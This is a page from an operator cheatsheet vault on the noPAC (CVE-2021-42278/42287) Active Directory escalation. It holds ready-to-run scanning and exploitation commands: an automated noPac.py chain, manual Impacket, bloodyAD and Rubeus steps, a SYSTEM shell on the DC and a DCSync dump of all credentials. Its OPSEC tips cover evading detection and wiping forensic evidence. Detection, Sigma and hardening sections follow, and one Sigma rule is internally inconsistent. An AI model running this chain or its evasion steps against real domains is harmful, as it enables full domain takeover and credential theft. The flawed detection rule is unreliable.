daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-44-nopac-sam-the-admin-cve-2021-42278-42287.md (24986B)


      1 ---
      2 title: "Attack #44 β€” noPAC Sam-the-Admin (CVE-2021-42278 42287)"
      3 description: "noPAC (Sam-the-Admin) chains two CVEs to escalate from any domain user to Domain Admin:"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory", "adcs", "kerberos", "privilege-escalation"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #44 β€” noPAC Sam-the-Admin (CVE-2021-42278 42287).md"
     11 ---
     12 # πŸ”΅ Attack #44 β€” noPAC / Sam-the-Admin (CVE-2021-42278/42287)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 noPAC (Sam-the-Admin) chains two CVEs to escalate from any domain user to Domain Admin:
     19 
     20 1. **[CVE-2021-42278](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278)** β€” Allows a machine account's `sAMAccountName` to not end with `$`, mimicking user accounts
     21 2. **[CVE-2021-42287](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287)** β€” KDC fails to verify PAC when a TGT is requested after renaming an account
     22 
     23 The attacker creates a machine account, renames it to match a DC's `sAMAccountName` (without `$`), requests a TGT, renames it back, then requests a service ticket β€” the KDC confuses the identity and issues a ticket with DC-level privileges.
     24 
     25 > [!info]+ Technical Deep-Dive β€” sAMAccountName Confusion & PAC Bypass
     26 > 1. **Step 1 β€” Machine Account Creation**: Any domain user can create machine accounts (up to `ms-DS-MachineAccountQuota`, default = 10). The attacker creates a machine account `NOPAC$`
     27 > 2. **Step 2 β€” sAMAccountName Rename** (CVE-2021-42278): The attacker renames `NOPAC$` to `DC01` (removing the `$` suffix). Normally, machine account sAMAccountNames MUST end with `$` β€” this CVE bypasses that validation
     28 > 3. **Step 3 β€” TGT Request**: The attacker requests a TGT as `DC01` using the machine account's known password. The KDC issues a TGT for `DC01` β€” the account currently named `DC01`
     29 > 4. **Step 4 β€” Rename Back**: The attacker renames the account back to `NOPAC$` (restoring the `$`)
     30 > 5. **Step 5 β€” S4U2Self** (CVE-2021-42287): The attacker uses the TGT (issued for `DC01`) to request a service ticket via **S4U2Self**, impersonating Administrator. The KDC looks up `DC01` β€” the renamed account is now `NOPAC$`, so it doesn't match. The KDC then searches for `DC01$` (appending `$`) and finds the **real Domain Controller**
     31 > 6. **Result**: The KDC issues a service ticket as if the request came from the real `DC01$` machine account β€” with full DC privileges, including the ability to DCSync
     32 > 7. *The core issue is that the KDC doesn't properly validate the PAC (Privilege Attribute Certificate) when the account name doesn't match β€” it falls back to appending `$` and finding a different account entirely*
     33 
     34 ***
     35 
     36 ## βš™οΈ Prerequisites
     37 
     38 | Requirement | Detail |
     39 |---|---|
     40 | **Any domain user credentials** | To create a machine account (needs MAQ > 0) |
     41 | **MachineAccountQuota > 0** | Default = 10; allows any domain user to create machine accounts |
     42 | **Unpatched DCs** | Patched November 2021 ([KB5008102](https://support.microsoft.com/en-us/help/5008102) / [KB5008380](https://support.microsoft.com/en-us/help/5008380)) |
     43 | **Network access to DC** | Standard Kerberos (TCP 88) and LDAP (TCP 389/636) ports |
     44 
     45 ***
     46 
     47 ## πŸ› οΈ Tools
     48 
     49 | Tool | Platform | Version | Notes |
     50 |---|---|---|---|
     51 | [noPac.py](https://github.com/Ridter/noPac) | Linux/Python | Python 3 | Automated exploit β€” scan + exploit in one command |
     52 | [sam-the-admin](https://github.com/WazeHell/sam-the-admin) | Linux/Python | Python 3 | Alternative automated exploit script |
     53 | [Impacket](https://github.com/fortra/impacket) | Linux | β‰₯ 0.10.0 | `addcomputer.py`, `renameMachine.py`, `getTGT.py`, `getST.py` β€” manual exploitation |
     54 | [bloodyAD](https://github.com/CravateRouge/bloodyAD) | Linux/Python | β‰₯ 1.0.0 | Machine account creation and sAMAccountName modification |
     55 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β‰₯ 1.1.0 | `-M nopac` module β€” scan for vulnerability |
     56 | [Rubeus](https://github.com/GhostPack/Rubeus) | Windows (.NET) | β‰₯ 2.0 | `asktgt` + `s4u` for Windows-based manual exploitation |
     57 | [PowerMAD](https://github.com/Kevin-Robertson/Powermad) | Windows/PowerShell | Latest | `New-MachineAccount` β€” PowerShell machine account creation |
     58 
     59 ***
     60 
     61 ## ⏱️ Time-to-Execute Estimates
     62 
     63 | Operation | Time | Notes |
     64 |---|---|---|
     65 | Vulnerability scan | **3–5 seconds** | noPac.py `-scan` mode |
     66 | Automated exploitation | **10–30 seconds** | Full chain: create β†’ rename β†’ TGT β†’ rename β†’ S4U β†’ shell |
     67 | Manual exploitation (6 steps) | **60–120 seconds** | Each Impacket command takes a few seconds |
     68 | Full chain β†’ DCSync | **30–60 seconds** | From any domain user to full credential dump |
     69 
     70 ***
     71 
     72 ## πŸ’» Full Commands
     73 
     74 ### πŸ”΅ Check Vulnerability
     75 
     76 ```bash
     77 # ── noPac.py scan mode ────────────────────────────────────────────────────────
     78 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
     79   -dc-host DC01 --scan
     80 # Output: "Current ms-DS-MachineAccountQuota = 10"
     81 # Output: "DC01 is VULNERABLE" or "DC01 is NOT VULNERABLE"
     82 
     83 # ── NetExec noPAC module ──────────────────────────────────────────────────────
     84 nxc smb DC01.corp.local -u low_user -p 'Password1' -M nopac
     85 # Output: [+] VULNERABLE or [-] not vulnerable
     86 
     87 # ── Check MAQ manually ────────────────────────────────────────────────────────
     88 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq
     89 # Or:
     90 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     91   get object 'DC=corp,DC=local' --attr ms-DS-MachineAccountQuota
     92 ```
     93 
     94 ### πŸ”΄ Automated Exploitation (Recommended)
     95 
     96 ```bash
     97 # ── noPac.py β€” fully automated β†’ SYSTEM shell on DC ──────────────────────────
     98 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
     99   -dc-host DC01 -shell --impersonate Administrator -use-ldap
    100 
    101 # Output: Interactive SYSTEM shell on DC01
    102 # From here: secretsdump.py, mimikatz, or any post-exploitation
    103 
    104 # ── noPac.py β€” get service ticket only (no shell) ────────────────────────────
    105 python3 noPac.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
    106   -dc-host DC01 --impersonate Administrator -use-ldap -dump
    107 # Dumps NTDS via DCSync using the impersonated Administrator ticket
    108 
    109 # ── sam-the-admin (alternative) ───────────────────────────────────────────────
    110 python3 sam_the_admin.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
    111   -dc-host DC01 -shell
    112 ```
    113 
    114 ### πŸ”΄ Manual Exploitation (Step-by-Step)
    115 
    116 ```bash
    117 # ── Step 1: Create machine account ────────────────────────────────────────────
    118 addcomputer.py -computer-name 'NOPAC$' -computer-pass 'FakePass!' \
    119   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    120 # Creates NOPAC$ with password FakePass!
    121 
    122 # ── Step 2: Rename sAMAccountName to DC01 (remove the $) ─────────────────────
    123 python3 renameMachine.py -current-name 'NOPAC$' -new-name 'DC01' \
    124   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
    125 # Now the machine account's sAMAccountName = "DC01" (without $)
    126 
    127 # ── Step 3: Request TGT as "DC01" ────────────────────────────────────────────
    128 getTGT.py corp.local/'DC01':'FakePass!' -dc-ip 10.10.10.10
    129 # Outputs: DC01.ccache β€” TGT for the account named "DC01"
    130 
    131 # ── Step 4: Rename back to NOPAC$ ────────────────────────────────────────────
    132 python3 renameMachine.py -current-name 'DC01' -new-name 'NOPAC$' \
    133   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
    134 # sAMAccountName restored to NOPAC$ β€” KDC will now look for "DC01$" (the real DC)
    135 
    136 # ── Step 5: Request service ticket (S4U2Self) using TGT ──────────────────────
    137 export KRB5CCNAME=DC01.ccache
    138 getST.py -spn cifs/DC01.corp.local -impersonate Administrator \
    139   -k -no-pass corp.local/'DC01' -dc-ip 10.10.10.10
    140 # KDC confusion: looks up "DC01", finds nothing, appends "$", finds real DC01$
    141 # Issues service ticket as Administrator for cifs/DC01.corp.local
    142 
    143 # ── Step 6: Use the impersonated Administrator ticket ─────────────────────────
    144 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache
    145 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    146 # Full DCSync as Administrator β€” extracts all domain credentials
    147 
    148 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    149 # Interactive SYSTEM shell on DC01
    150 ```
    151 
    152 #### bloodyAD Alternative (Machine Account Creation)
    153 
    154 ```bash
    155 # ── Create machine account with bloodyAD ──────────────────────────────────────
    156 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
    157   add computer 'NOPAC$' 'FakePass!'
    158 
    159 # ── Modify sAMAccountName ────────────────────────────────────────────────────
    160 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
    161   set object 'NOPAC$' sAMAccountName -v 'DC01'
    162 ```
    163 
    164 #### Windows-Based (Rubeus + PowerMAD)
    165 
    166 ```powershell
    167 # ── Create machine account with PowerMAD ──────────────────────────────────────
    168 Import-Module .\Powermad.ps1
    169 New-MachineAccount -MachineAccount NOPAC -Password $(ConvertTo-SecureString 'FakePass!' -AsPlainText -Force)
    170 
    171 # ── Rename (requires AD module or direct LDAP modification) ──────────────────
    172 Set-ADComputer NOPAC -SamAccountName 'DC01'
    173 
    174 # ── Request TGT with Rubeus ──────────────────────────────────────────────────
    175 .\Rubeus.exe asktgt /user:DC01 /password:FakePass! /domain:corp.local /dc:DC01.corp.local /nowrap
    176 
    177 # ── Rename back ───────────────────────────────────────────────────────────────
    178 Set-ADComputer NOPAC -SamAccountName 'NOPAC$'
    179 
    180 # ── S4U with Rubeus ──────────────────────────────────────────────────────────
    181 .\Rubeus.exe s4u /ticket:<base64_TGT> /impersonateuser:Administrator /msdsspn:cifs/DC01.corp.local /ptt
    182 # Ticket injected into current session β€” access DC01 as Administrator
    183 ```
    184 
    185 ### πŸ”΄ Post-Exploitation Cleanup
    186 
    187 ```bash
    188 # ── Delete the machine account after exploitation ─────────────────────────────
    189 addcomputer.py -computer-name 'NOPAC$' -dc-ip 10.10.10.10 \
    190   corp.local/Administrator:'Password1' -delete
    191 
    192 # ── Or via bloodyAD ──────────────────────────────────────────────────────────
    193 bloodyAD -d corp.local -u Administrator -p 'Password1' --host DC01.corp.local \
    194   remove computer 'NOPAC$'
    195 ```
    196 
    197 ***
    198 
    199 ## 🎯 OPSEC Tips
    200 
    201 1. **noPac.py automated mode is fast but creates a machine account** β€” this is logged (Event 4741) and persists in AD unless cleaned up
    202 2. **Always delete the machine account after exploitation** β€” leftover accounts with non-standard names are forensic artifacts
    203 3. **The sAMAccountName rename is the most detectable step** β€” Event 4742 logs the attribute change; this is unusual for machine accounts
    204 4. **Use `-use-ldap` flag** with noPac.py β€” some environments have issues with the default SAMR protocol for machine account operations
    205 5. **Manual exploitation is stealthier than automated** β€” you control the timing between each step and can add delays
    206 6. **Check MAQ before starting** β€” if MachineAccountQuota = 0, you can't create machine accounts; look for existing machine accounts you can modify instead
    207 7. **Clean up ccache files** after exploitation β€” `DC01.ccache` and the impersonated ticket are evidence
    208 
    209 ### πŸ“Š OpSec Ranking
    210 
    211 | Method | Stealth | Speed | Reliability | Notes |
    212 |---|---|---|---|---|
    213 | noPac.py automated | 🟑 Medium | 🟒 Fast | 🟒 High | Fast but creates machine account + renames |
    214 | Manual Impacket steps | 🟑 Medium | 🟑 Medium | 🟒 High | More control; can add delays between steps |
    215 | Rubeus + PowerMAD (Windows) | 🟑 Medium | 🟑 Medium | 🟑 Medium | PowerShell logging catches module loads |
    216 | bloodyAD + Impacket | 🟑 Medium | 🟑 Medium | 🟒 High | Good alternative; fewer dependencies |
    217 
    218 ***
    219 
    220 ## πŸ›‘οΈ Detection β€” Event IDs
    221 
    222 | Event ID | Source | What to Look For |
    223 |---|---|---|
    224 | **4741** | Security Log (DC) | Machine account creation β€” `NOPAC$` or unusual naming pattern |
    225 | **4742** | Security Log (DC) | Machine account renamed β€” `sAMAccountName` changed (critical indicator) |
    226 | **4768** | Security Log (DC) | TGT request for account matching DC name (e.g., `DC01` without `$`) |
    227 | **4769** | Security Log (DC) | Service ticket request (S4U2Self) using the confused identity |
    228 | **4743** | Security Log (DC) | Machine account deleted (cleanup by attacker) |
    229 
    230 ### πŸ”Ž Sigma Rules
    231 
    232 ```yaml
    233 # ── SigmaHQ β€” Machine Account sAMAccountName Change (noPAC Indicator) ────────
    234 title: Machine Account sAMAccountName Modification (noPAC/CVE-2021-42278)
    235 id: c7d8e9f0-nopac-samaccountname-change
    236 status: stable
    237 logsource:
    238   product: windows
    239   service: security
    240 detection:
    241   selection:
    242     EventID: 4742
    243   keywords:
    244     AttributeValue|contains: 'sAMAccountName'
    245   condition: selection
    246 level: critical
    247 tags:
    248   - attack.privilege_escalation
    249   - attack.t1068
    250   - cve.2021.42278
    251   - cve.2021.42287
    252 ```
    253 
    254 ```yaml
    255 # ── SigmaHQ β€” TGT Request for DC Name Without $ Suffix ───────────────────────
    256 title: TGT Request for Account Matching DC Name (noPAC Indicator)
    257 id: a1b2c3d4-nopac-tgt-dc-name
    258 logsource:
    259   product: windows
    260   service: security
    261 detection:
    262   selection:
    263     EventID: 4768
    264     TargetUserName|endswith: ''  # Does NOT end with $
    265   filter_dc:
    266     TargetUserName|endswith: '$'
    267   filter_users:
    268     TargetUserName|re: '^(?!DC|dc)'  # Only alert on names matching DC naming patterns
    269   condition: selection and not filter_dc
    270 level: high
    271 ```
    272 
    273 ### πŸ›‘οΈ EDR-Specific Detections
    274 
    275 > [!warning]+ Microsoft Defender for Identity (MDI)
    276 > 1. **"Suspected noPac exploitation (CVE-2021-42278/42287)"** β€” specific detection for the sAMAccountName rename + TGT request pattern
    277 > 2. MDI correlates machine account creation β†’ rename β†’ TGT request β†’ rename-back as a single attack sequence
    278 > 3. **"Suspicious machine account name change"** β€” fires on any machine account sAMAccountName modification that removes the `$` suffix
    279 > 4. *MDI added noPAC detection within weeks of the CVE disclosure β€” high-confidence alerting*
    280 
    281 > [!warning]+ CrowdStrike Falcon
    282 > 1. **"noPAC/Sam-the-Admin Exploitation"** β€” behavioral detection for the machine account creation β†’ rename β†’ Kerberos abuse chain
    283 > 2. Falcon detects automated exploitation tools (noPac.py, sam-the-admin) via process and network behavioral analysis
    284 > 3. Also detects the Kerberos ticket manipulation (S4U2Self with confused identity)
    285 
    286 > [!warning]+ Elastic Security
    287 > 1. Rule: **"Machine Account sAMAccountName Changed"** β€” Event 4742 correlation for sAMAccountName attribute modifications
    288 > 2. Rule: **"TGT Requested for Account Matching Domain Controller Name"** β€” Event 4768 correlation
    289 > 3. Rule: **"Rapid Machine Account Create-Rename-Delete Pattern"** β€” temporal correlation of Events 4741β†’4742β†’4743
    290 
    291 ***
    292 
    293 ## πŸ”¬ Forensic Artifacts
    294 
    295 | Artifact | Location | Details |
    296 |---|---|---|
    297 | **Machine account creation** | Event 4741 | New computer account `NOPAC$` with creation timestamp |
    298 | **sAMAccountName change** | Event 4742 | Machine account renamed β€” old value (`NOPAC$`) β†’ new value (`DC01`) |
    299 | **TGT request** | Event 4768 | TGT for `DC01` (without `$`) β€” matches a DC naming pattern |
    300 | **S4U2Self ticket** | Event 4769 | Service ticket request impersonating Administrator |
    301 | **Machine account deletion** | Event 4743 | Account deleted (cleanup β€” if attacker was thorough) |
    302 | **ccache files** | Attacker filesystem | `DC01.ccache` and `Administrator@cifs_*.ccache` β€” evidence of exploitation |
    303 | **AD attribute metadata** | `msDS-ReplAttributeMetaData` on the machine account | sAMAccountName modification timestamps and originating DC |
    304 | **Kerberos ticket cache** | DC LSASS memory | TGT and service tickets issued during the attack β€” volatile |
    305 
    306 ***
    307 
    308 > [!important]+ Windows Server Version & Patch Timeline
    309 > 1. **November 2021 (KB5008102/KB5008380)**: Initial patch released β€” fixes both CVE-2021-42278 and CVE-2021-42287
    310 > 2. **April 2022**: Enforcement phase β€” KDC rejects tickets without proper PAC validation
    311 > 3. **July 2022**: Full enforcement β€” PAC validation required; non-patched clients may experience authentication failures
    312 > 4. **Server 2012 R2**: Vulnerable if unpatched; enforcement timeline applies
    313 > 5. **Server 2016**: Vulnerable if unpatched; same timeline
    314 > 6. **Server 2019**: Vulnerable if unpatched; same timeline
    315 > 7. **Server 2022**: Vulnerable if unpatched (even though it was released before the CVE); patches available
    316 > 8. **Server 2025**: Shipped with fixes included β€” NOT vulnerable; PAC validation enforced by default
    317 > 9. *The enforcement phase is critical β€” even after patching, there's a grace period before the KDC rejects vulnerable tickets; check `PacRequestorEnforcement` registry key*
    318 
    319 ***
    320 
    321 ## πŸ”’ Hardening & Prevention
    322 
    323 ```powershell
    324 # ── 1. Set MachineAccountQuota to 0 (prevent machine account creation) ────────
    325 Set-ADDomain -Identity corp.local -Replace @{"ms-DS-MachineAccountQuota"="0"}
    326 # Blocks any domain user from creating machine accounts
    327 # ⚠️ May break self-service domain join β€” use targeted delegation instead
    328 
    329 # ── 2. Apply November 2021 patches ───────────────────────────────────────────
    330 # Verify patches:
    331 Get-HotFix | Where-Object { $_.HotFixID -match 'KB5008102|KB5008380|KB5008212' }
    332 # If empty β†’ DC is vulnerable
    333 
    334 # ── 3. Enable PAC validation enforcement ──────────────────────────────────────
    335 # Registry key (post-patch):
    336 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" `
    337   -Name "PacRequestorEnforcement" -Value 2 -Type DWord
    338 # Value 0 = Disabled (not recommended)
    339 # Value 1 = Add PAC validation but don't enforce (default after Nov 2021 patch)
    340 # Value 2 = Full enforcement (recommended β€” rejects tickets without PAC)
    341 
    342 # ── 4. Monitor machine account creation and modification ──────────────────────
    343 # GPO β†’ Computer Configuration β†’ Windows Settings β†’ Security Settings β†’
    344 # Advanced Audit Policy β†’ Account Management β†’
    345 #   βœ… Audit Computer Account Management: Success, Failure
    346 
    347 # ── 5. Alert on sAMAccountName changes for machine accounts ──────────────────
    348 # SIEM query (Splunk example):
    349 # source=WinEventLog:Security EventCode=4742 TargetUserName=*$
    350 #   | search "sAMAccountName" | table _time, TargetUserName, SubjectUserName
    351 
    352 # ── 6. Restrict who can create machine accounts ──────────────────────────────
    353 # If MAQ must be > 0, delegate machine account creation to specific OUs:
    354 # Use fine-grained permissions instead of domain-wide MAQ
    355 
    356 # ── 7. Monitor for DC-name TGT requests from non-DC accounts ─────────────────
    357 # Alert on Event 4768 where TargetUserName matches a DC name but lacks $
    358 # This is the definitive noPAC exploitation indicator
    359 
    360 # ── 8. Deploy MDI for automated detection ─────────────────────────────────────
    361 # MDI has specific noPAC detection since December 2021
    362 ```
    363 
    364 ***
    365 
    366 ## 🧩 Troubleshooting
    367 
    368 | Error | Cause | Fix |
    369 |---|---|---|
    370 | `Machine account creation failed β€” quota exceeded` | MachineAccountQuota = 0 or user already created max accounts | Check MAQ value; if 0, cannot exploit via this path β€” look for existing machine accounts to modify |
    371 | `renameMachine.py: Access denied` | Insufficient permissions to modify the machine account | Verify the user who created the account owns it; use the same user for rename; or try `bloodyAD` |
    372 | `getTGT: KDC_ERR_C_PRINCIPAL_UNKNOWN` | sAMAccountName rename didn't take effect yet | Wait a few seconds for AD replication; verify rename with `Get-ADComputer NOPAC -Properties sAMAccountName` |
    373 | `getST: KRB_AP_ERR_SKEW` | Clock skew > 5 minutes | Sync time: `ntpdate DC01.corp.local` |
    374 | `getST: KDC_ERR_BADOPTION` | S4U2Self failed β€” DC may be patched | Verify DC patch status; if `PacRequestorEnforcement = 2`, the exploit is blocked |
    375 | noPac.py `-shell` hangs | Network connectivity issue or SMB blocked | Try `-dump` instead of `-shell`; or use the manual approach with `getST.py` + `secretsdump.py` |
    376 | `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` | Using machine account TGT incorrectly | Ensure you're using the TGT from Step 3 (before rename-back) for the S4U request |
    377 | Manual exploit: wrong ticket in Step 6 | Using TGT instead of S4U service ticket | After Step 5, `export KRB5CCNAME=Administrator@cifs_DC01...` (the S4U output), NOT the original TGT |
    378 
    379 ***
    380 
    381 ## πŸ—ΊοΈ MITRE ATT&CK
    382 
    383 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    384 |---|---|---|---|---|
    385 | **Privilege Escalation** | [T1068](https://attack.mitre.org/techniques/T1068/) | Exploitation for Privilege Escalation | Exploit CVE-2021-42278/42287 to escalate from any domain user to DA via sAMAccountName confusion | Ransomware operators (Conti, LockBit) |
    386 | **Credential Access** | [T1558](https://attack.mitre.org/techniques/T1558/) | Steal or Forge Kerberos Tickets | Abuse S4U2Self with confused identity to obtain Administrator service ticket | Chained technique |
    387 | **Persistence** | [T1136](https://attack.mitre.org/techniques/T1136/) | [.002 β€” Domain Account](https://attack.mitre.org/techniques/T1136/002/) | Create machine account as part of the exploitation chain | Supporting technique |
    388 
    389 > [!tip]+ Real-World Context
    390 > `fas:Lightbulb`
    391 > 1. **noPAC was weaponized within days of disclosure** (December 2021) β€” automated exploit tools appeared on GitHub almost immediately
    392 > 2. **Conti ransomware group** incorporated noPAC into their automated domain compromise playbook as a fast-path escalation from any domain user to DA
    393 > 3. **LockBit affiliates** used noPAC in early 2022 campaigns against healthcare and manufacturing targets
    394 > 4. *noPAC is considered one of the most impactful AD privilege escalation vulnerabilities because it requires only any domain user account β€” no special permissions, no ACL abuse, just standard domain authentication*
    395 
    396 ***
    397 
    398 ## πŸ”— Attack Chain Context
    399 
    400 ```
    401 [noPAC] ──→ Low-priv User β†’ DA via Machine Account Naming Confusion
    402          β”‚
    403          β”œβ”€β”€β†’ πŸ’₯ CVE-2021-42278 + CVE-2021-42287
    404          β”œβ”€β”€β†’ πŸ’» Any domain user β†’ SYSTEM shell on DC β†’ DCSync (Attack #37)
    405          β”œβ”€β”€β†’ 🎫 DCSync KRBTGT β†’ Golden Ticket (Attack #11)
    406          β”œβ”€β”€β†’ πŸ’» DCSync Administrator β†’ Pass-the-Hash (Attack #4)
    407          β”œβ”€β”€β†’ πŸ”— Alternative to: Kerberoasting (Attack #2) β†’ cracking β†’ DA
    408          β”œβ”€β”€β†’ πŸ”— Compare: Zerologon (Attack #40) β€” unauth; noPAC needs any domain user
    409          β”œβ”€β”€β†’ πŸ“‹ Patched Nov 2021, but legacy DCs may remain vulnerable
    410          └──→ πŸ’€ Defeated by: patch, set MAQ=0, enforce PacRequestorEnforcement=2, monitor account renames
    411 ```
    412 
    413 ***
    414 
    415 > βœ… **Attack #44 β€” noPAC complete.**
    416 
    417 ***
    418 
    419 > 🏁 **Category 5 β€” DC & Replication Attacks is now COMPLETE (8/8 attacks).**